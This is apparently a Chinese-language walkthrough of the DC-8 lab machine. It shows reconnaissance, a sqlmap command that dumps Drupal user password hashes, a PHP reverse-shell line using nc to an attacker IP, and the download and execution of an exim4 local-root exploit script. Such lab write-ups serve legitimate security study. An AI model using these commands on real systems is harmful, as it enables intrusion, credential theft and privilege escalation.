信息收集

靶机IP:192.168.1.117

1.访问首页面发现三个页面的url由数字控制

http://192.168.1.117/?nid=2

bp爆破发现一个sql语句，一个路径.

• SELECT title FROM node WHERE nid = 10

• /var/www/html/sites/all/modules/mypages/mypages.module

2.在http://192.168.1.117/node/3页面发现一个用户admin的邮件发送页面

3.网站CMS

4.端口探测 22、80

nmap -T4 -A -v 192.168.1.117

5.目录扫描

http://192.168.1.117/user/login/ 登录界面
http://192.168.1.117/xmlrpc.php 
http://192.168.1.117/robots.txt      
​

访问xmlepc.php 构造请求包查看允许的方法。

请求包：

GET /xmlrpc.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Content-Length: 91
​
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

返回包：发现没有可利用的方法。

访问robots.txt

渗透过程

1.sqlmap爆破发现存在注入点，尝试注入。

http://192.168.1.117/?nid=1

payload:

数据库：d7db 数据表：users 列：name、pass

sqlmap -u http://192.168.1.117/?nid=1 --cookie="has_js:"1"" --batch -D d7db -T users -C "name,pass" --dump
​
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 
​

john爆破

2.账号密码：john/turtle 登录成功

3.drupal php模板漏洞利用

Add content——Webfrom——Find contert——WebForm——Form setting

写入php反弹shell

<?php system("nc -e /bin/bash 192.168.1.110 3333"); ?>

发送邮件你kali监听

nc -lvvp 3333

提权

查看那些命令有root权限

find / -perm -u=s -type f 2>/dev/null

发现exim4

查看exim4版本,在msfconsole搜索漏洞

exim4 --version
exim version 4.89

将46996.sh复制到kali的网站根目录下(/var/www/html)

在靶机上的/var/tmp目录执行：因为此目录有写的权限

wget http://kaliIP/46996.sh

然后赋权：chmod 777 46996.sh

在46996.sh，里面发现两个执行sh脚本命令：

经尝试./46996.sh -m netcat 成功提权。

总结：

漏洞利用点,SQL注入、drupal php漏洞模板。

在DC8中加强了我对sqlmap、john、searchsploit工具的使用。

从含有root权限的命令入手提权